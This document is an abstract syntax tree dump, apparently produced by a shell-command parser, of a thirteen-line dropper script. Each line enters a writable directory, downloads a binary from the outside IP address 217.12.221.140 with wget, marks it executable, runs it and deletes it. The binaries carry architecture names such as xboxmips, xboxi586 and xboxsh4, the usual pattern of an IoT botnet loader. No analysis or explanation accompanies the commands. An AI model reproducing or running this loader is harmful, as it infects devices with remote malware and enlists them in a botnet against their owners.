ListNode(lineno=2, pos=(12, 150), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 102), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 102), word='http://217.12.221.140/xboxmips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(102, 103)),
  CommandNode(lineno=2, pos=(104, 121), parts=[
    WordNode(lineno=2, pos=(104, 109), word='chmod'),
    WordNode(lineno=2, pos=(110, 112), word='+x'),
    WordNode(lineno=2, pos=(113, 121), word='xboxmips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(121, 122)),
  CommandNode(lineno=2, pos=(123, 133), parts=[
    WordNode(lineno=2, pos=(123, 133), word='./xboxmips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(133, 134)),
  CommandNode(lineno=2, pos=(135, 150), parts=[
    WordNode(lineno=2, pos=(135, 137), word='rm'),
    WordNode(lineno=2, pos=(138, 141), word='-rf'),
    WordNode(lineno=2, pos=(142, 150), word='xboxmips'),
  ]),
])
ListNode(lineno=3, pos=(151, 297), parts=[
  CommandNode(lineno=3, pos=(151, 158), parts=[
    WordNode(lineno=3, pos=(151, 153), word='cd'),
    WordNode(lineno=3, pos=(154, 158), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(159, 161)),
  CommandNode(lineno=3, pos=(162, 173), parts=[
    WordNode(lineno=3, pos=(162, 164), word='cd'),
    WordNode(lineno=3, pos=(165, 173), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(174, 176)),
  CommandNode(lineno=3, pos=(177, 184), parts=[
    WordNode(lineno=3, pos=(177, 179), word='cd'),
    WordNode(lineno=3, pos=(180, 184), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(185, 187)),
  CommandNode(lineno=3, pos=(188, 196), parts=[
    WordNode(lineno=3, pos=(188, 190), word='cd'),
    WordNode(lineno=3, pos=(191, 196), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(197, 199)),
  CommandNode(lineno=3, pos=(200, 204), parts=[
    WordNode(lineno=3, pos=(200, 202), word='cd'),
    WordNode(lineno=3, pos=(203, 204), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(204, 205)),
  CommandNode(lineno=3, pos=(206, 243), parts=[
    WordNode(lineno=3, pos=(206, 210), word='wget'),
    WordNode(lineno=3, pos=(211, 243), word='http://217.12.221.140/xboxmipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(243, 244)),
  CommandNode(lineno=3, pos=(245, 264), parts=[
    WordNode(lineno=3, pos=(245, 250), word='chmod'),
    WordNode(lineno=3, pos=(251, 253), word='+x'),
    WordNode(lineno=3, pos=(254, 264), word='xboxmipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(264, 265)),
  CommandNode(lineno=3, pos=(266, 278), parts=[
    WordNode(lineno=3, pos=(266, 278), word='./xboxmipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(278, 279)),
  CommandNode(lineno=3, pos=(280, 297), parts=[
    WordNode(lineno=3, pos=(280, 282), word='rm'),
    WordNode(lineno=3, pos=(283, 286), word='-rf'),
    WordNode(lineno=3, pos=(287, 297), word='xboxmipsel'),
  ]),
])
ListNode(lineno=4, pos=(298, 432), parts=[
  CommandNode(lineno=4, pos=(298, 305), parts=[
    WordNode(lineno=4, pos=(298, 300), word='cd'),
    WordNode(lineno=4, pos=(301, 305), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(306, 308)),
  CommandNode(lineno=4, pos=(309, 320), parts=[
    WordNode(lineno=4, pos=(309, 311), word='cd'),
    WordNode(lineno=4, pos=(312, 320), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(321, 323)),
  CommandNode(lineno=4, pos=(324, 331), parts=[
    WordNode(lineno=4, pos=(324, 326), word='cd'),
    WordNode(lineno=4, pos=(327, 331), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(332, 334)),
  CommandNode(lineno=4, pos=(335, 343), parts=[
    WordNode(lineno=4, pos=(335, 337), word='cd'),
    WordNode(lineno=4, pos=(338, 343), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(344, 346)),
  CommandNode(lineno=4, pos=(347, 351), parts=[
    WordNode(lineno=4, pos=(347, 349), word='cd'),
    WordNode(lineno=4, pos=(350, 351), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(351, 352)),
  CommandNode(lineno=4, pos=(353, 387), parts=[
    WordNode(lineno=4, pos=(353, 357), word='wget'),
    WordNode(lineno=4, pos=(358, 387), word='http://217.12.221.140/xboxsh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(387, 388)),
  CommandNode(lineno=4, pos=(389, 405), parts=[
    WordNode(lineno=4, pos=(389, 394), word='chmod'),
    WordNode(lineno=4, pos=(395, 397), word='+x'),
    WordNode(lineno=4, pos=(398, 405), word='xboxsh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(405, 406)),
  CommandNode(lineno=4, pos=(407, 416), parts=[
    WordNode(lineno=4, pos=(407, 416), word='./xboxsh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(416, 417)),
  CommandNode(lineno=4, pos=(418, 432), parts=[
    WordNode(lineno=4, pos=(418, 420), word='rm'),
    WordNode(lineno=4, pos=(421, 424), word='-rf'),
    WordNode(lineno=4, pos=(425, 432), word='xboxsh4'),
  ]),
])
ListNode(lineno=5, pos=(433, 579), parts=[
  CommandNode(lineno=5, pos=(433, 440), parts=[
    WordNode(lineno=5, pos=(433, 435), word='cd'),
    WordNode(lineno=5, pos=(436, 440), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(441, 443)),
  CommandNode(lineno=5, pos=(444, 455), parts=[
    WordNode(lineno=5, pos=(444, 446), word='cd'),
    WordNode(lineno=5, pos=(447, 455), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(456, 458)),
  CommandNode(lineno=5, pos=(459, 466), parts=[
    WordNode(lineno=5, pos=(459, 461), word='cd'),
    WordNode(lineno=5, pos=(462, 466), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(467, 469)),
  CommandNode(lineno=5, pos=(470, 478), parts=[
    WordNode(lineno=5, pos=(470, 472), word='cd'),
    WordNode(lineno=5, pos=(473, 478), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(479, 481)),
  CommandNode(lineno=5, pos=(482, 486), parts=[
    WordNode(lineno=5, pos=(482, 484), word='cd'),
    WordNode(lineno=5, pos=(485, 486), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(486, 487)),
  CommandNode(lineno=5, pos=(488, 525), parts=[
    WordNode(lineno=5, pos=(488, 492), word='wget'),
    WordNode(lineno=5, pos=(493, 525), word='http://217.12.221.140/xboxserver'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(525, 526)),
  CommandNode(lineno=5, pos=(527, 546), parts=[
    WordNode(lineno=5, pos=(527, 532), word='chmod'),
    WordNode(lineno=5, pos=(533, 535), word='+x'),
    WordNode(lineno=5, pos=(536, 546), word='xboxserver'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(546, 547)),
  CommandNode(lineno=5, pos=(548, 560), parts=[
    WordNode(lineno=5, pos=(548, 560), word='./xboxserver'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(560, 561)),
  CommandNode(lineno=5, pos=(562, 579), parts=[
    WordNode(lineno=5, pos=(562, 564), word='rm'),
    WordNode(lineno=5, pos=(565, 568), word='-rf'),
    WordNode(lineno=5, pos=(569, 579), word='xboxserver'),
  ]),
])
ListNode(lineno=6, pos=(580, 726), parts=[
  CommandNode(lineno=6, pos=(580, 587), parts=[
    WordNode(lineno=6, pos=(580, 582), word='cd'),
    WordNode(lineno=6, pos=(583, 587), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(588, 590)),
  CommandNode(lineno=6, pos=(591, 602), parts=[
    WordNode(lineno=6, pos=(591, 593), word='cd'),
    WordNode(lineno=6, pos=(594, 602), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(603, 605)),
  CommandNode(lineno=6, pos=(606, 613), parts=[
    WordNode(lineno=6, pos=(606, 608), word='cd'),
    WordNode(lineno=6, pos=(609, 613), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(614, 616)),
  CommandNode(lineno=6, pos=(617, 625), parts=[
    WordNode(lineno=6, pos=(617, 619), word='cd'),
    WordNode(lineno=6, pos=(620, 625), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(626, 628)),
  CommandNode(lineno=6, pos=(629, 633), parts=[
    WordNode(lineno=6, pos=(629, 631), word='cd'),
    WordNode(lineno=6, pos=(632, 633), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(633, 634)),
  CommandNode(lineno=6, pos=(635, 672), parts=[
    WordNode(lineno=6, pos=(635, 639), word='wget'),
    WordNode(lineno=6, pos=(640, 672), word='http://217.12.221.140/xboxtelnet'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(672, 673)),
  CommandNode(lineno=6, pos=(674, 693), parts=[
    WordNode(lineno=6, pos=(674, 679), word='chmod'),
    WordNode(lineno=6, pos=(680, 682), word='+x'),
    WordNode(lineno=6, pos=(683, 693), word='xboxtelnet'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(693, 694)),
  CommandNode(lineno=6, pos=(695, 707), parts=[
    WordNode(lineno=6, pos=(695, 707), word='./xboxtelnet'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(707, 708)),
  CommandNode(lineno=6, pos=(709, 726), parts=[
    WordNode(lineno=6, pos=(709, 711), word='rm'),
    WordNode(lineno=6, pos=(712, 715), word='-rf'),
    WordNode(lineno=6, pos=(716, 726), word='xboxtelnet'),
  ]),
])
ListNode(lineno=7, pos=(727, 889), parts=[
  CommandNode(lineno=7, pos=(727, 734), parts=[
    WordNode(lineno=7, pos=(727, 729), word='cd'),
    WordNode(lineno=7, pos=(730, 734), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(735, 737)),
  CommandNode(lineno=7, pos=(738, 749), parts=[
    WordNode(lineno=7, pos=(738, 740), word='cd'),
    WordNode(lineno=7, pos=(741, 749), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(750, 752)),
  CommandNode(lineno=7, pos=(753, 760), parts=[
    WordNode(lineno=7, pos=(753, 755), word='cd'),
    WordNode(lineno=7, pos=(756, 760), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(761, 763)),
  CommandNode(lineno=7, pos=(764, 772), parts=[
    WordNode(lineno=7, pos=(764, 766), word='cd'),
    WordNode(lineno=7, pos=(767, 772), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(773, 775)),
  CommandNode(lineno=7, pos=(776, 780), parts=[
    WordNode(lineno=7, pos=(776, 778), word='cd'),
    WordNode(lineno=7, pos=(779, 780), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(780, 781)),
  CommandNode(lineno=7, pos=(782, 823), parts=[
    WordNode(lineno=7, pos=(782, 786), word='wget'),
    WordNode(lineno=7, pos=(787, 823), word='http://217.12.221.140/xboxshitserver'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(823, 824)),
  CommandNode(lineno=7, pos=(825, 848), parts=[
    WordNode(lineno=7, pos=(825, 830), word='chmod'),
    WordNode(lineno=7, pos=(831, 833), word='+x'),
    WordNode(lineno=7, pos=(834, 848), word='xboxshitserver'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(848, 849)),
  CommandNode(lineno=7, pos=(850, 866), parts=[
    WordNode(lineno=7, pos=(850, 866), word='./xboxshitserver'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(866, 867)),
  CommandNode(lineno=7, pos=(868, 889), parts=[
    WordNode(lineno=7, pos=(868, 870), word='rm'),
    WordNode(lineno=7, pos=(871, 874), word='-rf'),
    WordNode(lineno=7, pos=(875, 889), word='xboxshitserver'),
  ]),
])
ListNode(lineno=8, pos=(890, 1040), parts=[
  CommandNode(lineno=8, pos=(890, 897), parts=[
    WordNode(lineno=8, pos=(890, 892), word='cd'),
    WordNode(lineno=8, pos=(893, 897), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(898, 900)),
  CommandNode(lineno=8, pos=(901, 912), parts=[
    WordNode(lineno=8, pos=(901, 903), word='cd'),
    WordNode(lineno=8, pos=(904, 912), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(913, 915)),
  CommandNode(lineno=8, pos=(916, 923), parts=[
    WordNode(lineno=8, pos=(916, 918), word='cd'),
    WordNode(lineno=8, pos=(919, 923), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(924, 926)),
  CommandNode(lineno=8, pos=(927, 935), parts=[
    WordNode(lineno=8, pos=(927, 929), word='cd'),
    WordNode(lineno=8, pos=(930, 935), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(936, 938)),
  CommandNode(lineno=8, pos=(939, 943), parts=[
    WordNode(lineno=8, pos=(939, 941), word='cd'),
    WordNode(lineno=8, pos=(942, 943), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(943, 944)),
  CommandNode(lineno=8, pos=(945, 983), parts=[
    WordNode(lineno=8, pos=(945, 949), word='wget'),
    WordNode(lineno=8, pos=(950, 983), word='http://217.12.221.140/xboxpoeerpc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(983, 984)),
  CommandNode(lineno=8, pos=(985, 1005), parts=[
    WordNode(lineno=8, pos=(985, 990), word='chmod'),
    WordNode(lineno=8, pos=(991, 993), word='+x'),
    WordNode(lineno=8, pos=(994, 1005), word='xboxpoeerpc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1005, 1006)),
  CommandNode(lineno=8, pos=(1007, 1020), parts=[
    WordNode(lineno=8, pos=(1007, 1020), word='./xboxpoeerpc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1020, 1021)),
  CommandNode(lineno=8, pos=(1022, 1040), parts=[
    WordNode(lineno=8, pos=(1022, 1024), word='rm'),
    WordNode(lineno=8, pos=(1025, 1028), word='-rf'),
    WordNode(lineno=8, pos=(1029, 1040), word='xboxpoeerpc'),
  ]),
])
ListNode(lineno=9, pos=(1041, 1179), parts=[
  CommandNode(lineno=9, pos=(1041, 1048), parts=[
    WordNode(lineno=9, pos=(1041, 1043), word='cd'),
    WordNode(lineno=9, pos=(1044, 1048), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1049, 1051)),
  CommandNode(lineno=9, pos=(1052, 1063), parts=[
    WordNode(lineno=9, pos=(1052, 1054), word='cd'),
    WordNode(lineno=9, pos=(1055, 1063), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1064, 1066)),
  CommandNode(lineno=9, pos=(1067, 1074), parts=[
    WordNode(lineno=9, pos=(1067, 1069), word='cd'),
    WordNode(lineno=9, pos=(1070, 1074), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1075, 1077)),
  CommandNode(lineno=9, pos=(1078, 1086), parts=[
    WordNode(lineno=9, pos=(1078, 1080), word='cd'),
    WordNode(lineno=9, pos=(1081, 1086), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1087, 1089)),
  CommandNode(lineno=9, pos=(1090, 1094), parts=[
    WordNode(lineno=9, pos=(1090, 1092), word='cd'),
    WordNode(lineno=9, pos=(1093, 1094), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1094, 1095)),
  CommandNode(lineno=9, pos=(1096, 1131), parts=[
    WordNode(lineno=9, pos=(1096, 1100), word='wget'),
    WordNode(lineno=9, pos=(1101, 1131), word='http://217.12.221.140/xboxi586'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1131, 1132)),
  CommandNode(lineno=9, pos=(1133, 1150), parts=[
    WordNode(lineno=9, pos=(1133, 1138), word='chmod'),
    WordNode(lineno=9, pos=(1139, 1141), word='+x'),
    WordNode(lineno=9, pos=(1142, 1150), word='xboxi586'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1150, 1151)),
  CommandNode(lineno=9, pos=(1152, 1162), parts=[
    WordNode(lineno=9, pos=(1152, 1162), word='./xboxi586'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1162, 1163)),
  CommandNode(lineno=9, pos=(1164, 1179), parts=[
    WordNode(lineno=9, pos=(1164, 1166), word='rm'),
    WordNode(lineno=9, pos=(1167, 1170), word='-rf'),
    WordNode(lineno=9, pos=(1171, 1179), word='xboxi586'),
  ]),
])
ListNode(lineno=10, pos=(1180, 1290), parts=[
  CommandNode(lineno=10, pos=(1180, 1187), parts=[
    WordNode(lineno=10, pos=(1180, 1182), word='cd'),
    WordNode(lineno=10, pos=(1183, 1187), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1188, 1190)),
  CommandNode(lineno=10, pos=(1191, 1202), parts=[
    WordNode(lineno=10, pos=(1191, 1193), word='cd'),
    WordNode(lineno=10, pos=(1194, 1202), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1203, 1205)),
  CommandNode(lineno=10, pos=(1206, 1213), parts=[
    WordNode(lineno=10, pos=(1206, 1208), word='cd'),
    WordNode(lineno=10, pos=(1209, 1213), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1214, 1216)),
  CommandNode(lineno=10, pos=(1217, 1225), parts=[
    WordNode(lineno=10, pos=(1217, 1219), word='cd'),
    WordNode(lineno=10, pos=(1220, 1225), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1226, 1228)),
  CommandNode(lineno=10, pos=(1229, 1233), parts=[
    WordNode(lineno=10, pos=(1229, 1231), word='cd'),
    WordNode(lineno=10, pos=(1232, 1233), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1233, 1234)),
  CommandNode(lineno=10, pos=(1235, 1263), parts=[
    WordNode(lineno=10, pos=(1235, 1239), word='wget'),
    WordNode(lineno=10, pos=(1240, 1263), word='http://217.12.221.140/d'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1263, 1264)),
  CommandNode(lineno=10, pos=(1265, 1275), parts=[
    WordNode(lineno=10, pos=(1265, 1270), word='chmod'),
    WordNode(lineno=10, pos=(1271, 1273), word='+x'),
    WordNode(lineno=10, pos=(1274, 1275), word='d'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1275, 1276)),
  CommandNode(lineno=10, pos=(1277, 1280), parts=[
    WordNode(lineno=10, pos=(1277, 1280), word='./d'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1280, 1281)),
  CommandNode(lineno=10, pos=(1282, 1290), parts=[
    WordNode(lineno=10, pos=(1282, 1284), word='rm'),
    WordNode(lineno=10, pos=(1285, 1288), word='-rf'),
    WordNode(lineno=10, pos=(1289, 1290), word='d'),
  ]),
])
ListNode(lineno=11, pos=(1291, 1401), parts=[
  CommandNode(lineno=11, pos=(1291, 1298), parts=[
    WordNode(lineno=11, pos=(1291, 1293), word='cd'),
    WordNode(lineno=11, pos=(1294, 1298), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1299, 1301)),
  CommandNode(lineno=11, pos=(1302, 1313), parts=[
    WordNode(lineno=11, pos=(1302, 1304), word='cd'),
    WordNode(lineno=11, pos=(1305, 1313), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1314, 1316)),
  CommandNode(lineno=11, pos=(1317, 1324), parts=[
    WordNode(lineno=11, pos=(1317, 1319), word='cd'),
    WordNode(lineno=11, pos=(1320, 1324), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1325, 1327)),
  CommandNode(lineno=11, pos=(1328, 1336), parts=[
    WordNode(lineno=11, pos=(1328, 1330), word='cd'),
    WordNode(lineno=11, pos=(1331, 1336), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1337, 1339)),
  CommandNode(lineno=11, pos=(1340, 1344), parts=[
    WordNode(lineno=11, pos=(1340, 1342), word='cd'),
    WordNode(lineno=11, pos=(1343, 1344), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1344, 1345)),
  CommandNode(lineno=11, pos=(1346, 1374), parts=[
    WordNode(lineno=11, pos=(1346, 1350), word='wget'),
    WordNode(lineno=11, pos=(1351, 1374), word='http://217.12.221.140/h'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1374, 1375)),
  CommandNode(lineno=11, pos=(1376, 1386), parts=[
    WordNode(lineno=11, pos=(1376, 1381), word='chmod'),
    WordNode(lineno=11, pos=(1382, 1384), word='+x'),
    WordNode(lineno=11, pos=(1385, 1386), word='h'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1386, 1387)),
  CommandNode(lineno=11, pos=(1388, 1391), parts=[
    WordNode(lineno=11, pos=(1388, 1391), word='./h'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1391, 1392)),
  CommandNode(lineno=11, pos=(1393, 1401), parts=[
    WordNode(lineno=11, pos=(1393, 1395), word='rm'),
    WordNode(lineno=11, pos=(1396, 1399), word='-rf'),
    WordNode(lineno=11, pos=(1400, 1401), word='h'),
  ]),
])
ListNode(lineno=12, pos=(1402, 1520), parts=[
  CommandNode(lineno=12, pos=(1402, 1409), parts=[
    WordNode(lineno=12, pos=(1402, 1404), word='cd'),
    WordNode(lineno=12, pos=(1405, 1409), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1410, 1412)),
  CommandNode(lineno=12, pos=(1413, 1424), parts=[
    WordNode(lineno=12, pos=(1413, 1415), word='cd'),
    WordNode(lineno=12, pos=(1416, 1424), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1425, 1427)),
  CommandNode(lineno=12, pos=(1428, 1435), parts=[
    WordNode(lineno=12, pos=(1428, 1430), word='cd'),
    WordNode(lineno=12, pos=(1431, 1435), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1436, 1438)),
  CommandNode(lineno=12, pos=(1439, 1447), parts=[
    WordNode(lineno=12, pos=(1439, 1441), word='cd'),
    WordNode(lineno=12, pos=(1442, 1447), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1448, 1450)),
  CommandNode(lineno=12, pos=(1451, 1455), parts=[
    WordNode(lineno=12, pos=(1451, 1453), word='cd'),
    WordNode(lineno=12, pos=(1454, 1455), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1455, 1456)),
  CommandNode(lineno=12, pos=(1457, 1487), parts=[
    WordNode(lineno=12, pos=(1457, 1461), word='wget'),
    WordNode(lineno=12, pos=(1462, 1487), word='http://217.12.221.140/ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1487, 1488)),
  CommandNode(lineno=12, pos=(1489, 1501), parts=[
    WordNode(lineno=12, pos=(1489, 1494), word='chmod'),
    WordNode(lineno=12, pos=(1495, 1497), word='+x'),
    WordNode(lineno=12, pos=(1498, 1501), word=' '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1501, 1502)),
  CommandNode(lineno=12, pos=(1503, 1508), parts=[
    WordNode(lineno=12, pos=(1503, 1508), word='./ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1508, 1509)),
  CommandNode(lineno=12, pos=(1510, 1520), parts=[
    WordNode(lineno=12, pos=(1510, 1512), word='rm'),
    WordNode(lineno=12, pos=(1513, 1516), word='-rf'),
    WordNode(lineno=12, pos=(1517, 1520), word=' '),
  ]),
])
ListNode(lineno=13, pos=(1521, 1631), parts=[
  CommandNode(lineno=13, pos=(1521, 1528), parts=[
    WordNode(lineno=13, pos=(1521, 1523), word='cd'),
    WordNode(lineno=13, pos=(1524, 1528), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1529, 1531)),
  CommandNode(lineno=13, pos=(1532, 1543), parts=[
    WordNode(lineno=13, pos=(1532, 1534), word='cd'),
    WordNode(lineno=13, pos=(1535, 1543), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1544, 1546)),
  CommandNode(lineno=13, pos=(1547, 1554), parts=[
    WordNode(lineno=13, pos=(1547, 1549), word='cd'),
    WordNode(lineno=13, pos=(1550, 1554), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1555, 1557)),
  CommandNode(lineno=13, pos=(1558, 1566), parts=[
    WordNode(lineno=13, pos=(1558, 1560), word='cd'),
    WordNode(lineno=13, pos=(1561, 1566), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1567, 1569)),
  CommandNode(lineno=13, pos=(1570, 1574), parts=[
    WordNode(lineno=13, pos=(1570, 1572), word='cd'),
    WordNode(lineno=13, pos=(1573, 1574), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1574, 1575)),
  CommandNode(lineno=13, pos=(1576, 1604), parts=[
    WordNode(lineno=13, pos=(1576, 1580), word='wget'),
    WordNode(lineno=13, pos=(1581, 1604), word='http://217.12.221.140/v'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1604, 1605)),
  CommandNode(lineno=13, pos=(1606, 1616), parts=[
    WordNode(lineno=13, pos=(1606, 1611), word='chmod'),
    WordNode(lineno=13, pos=(1612, 1614), word='+x'),
    WordNode(lineno=13, pos=(1615, 1616), word='v'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1616, 1617)),
  CommandNode(lineno=13, pos=(1618, 1621), parts=[
    WordNode(lineno=13, pos=(1618, 1621), word='./v'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1621, 1622)),
  CommandNode(lineno=13, pos=(1623, 1631), parts=[
    WordNode(lineno=13, pos=(1623, 1625), word='rm'),
    WordNode(lineno=13, pos=(1626, 1629), word='-rf'),
    WordNode(lineno=13, pos=(1630, 1631), word='v'),
  ]),
])
ListNode(lineno=14, pos=(1632, 1742), parts=[
  CommandNode(lineno=14, pos=(1632, 1639), parts=[
    WordNode(lineno=14, pos=(1632, 1634), word='cd'),
    WordNode(lineno=14, pos=(1635, 1639), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1640, 1642)),
  CommandNode(lineno=14, pos=(1643, 1654), parts=[
    WordNode(lineno=14, pos=(1643, 1645), word='cd'),
    WordNode(lineno=14, pos=(1646, 1654), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1655, 1657)),
  CommandNode(lineno=14, pos=(1658, 1665), parts=[
    WordNode(lineno=14, pos=(1658, 1660), word='cd'),
    WordNode(lineno=14, pos=(1661, 1665), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1666, 1668)),
  CommandNode(lineno=14, pos=(1669, 1677), parts=[
    WordNode(lineno=14, pos=(1669, 1671), word='cd'),
    WordNode(lineno=14, pos=(1672, 1677), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1678, 1680)),
  CommandNode(lineno=14, pos=(1681, 1685), parts=[
    WordNode(lineno=14, pos=(1681, 1683), word='cd'),
    WordNode(lineno=14, pos=(1684, 1685), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1685, 1686)),
  CommandNode(lineno=14, pos=(1687, 1715), parts=[
    WordNode(lineno=14, pos=(1687, 1691), word='wget'),
    WordNode(lineno=14, pos=(1692, 1715), word='http://217.12.221.140/j'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1715, 1716)),
  CommandNode(lineno=14, pos=(1717, 1727), parts=[
    WordNode(lineno=14, pos=(1717, 1722), word='chmod'),
    WordNode(lineno=14, pos=(1723, 1725), word='+x'),
    WordNode(lineno=14, pos=(1726, 1727), word='j'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1727, 1728)),
  CommandNode(lineno=14, pos=(1729, 1732), parts=[
    WordNode(lineno=14, pos=(1729, 1732), word='./j'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1732, 1733)),
  CommandNode(lineno=14, pos=(1734, 1742), parts=[
    WordNode(lineno=14, pos=(1734, 1736), word='rm'),
    WordNode(lineno=14, pos=(1737, 1740), word='-rf'),
    WordNode(lineno=14, pos=(1741, 1742), word='j'),
  ]),
])
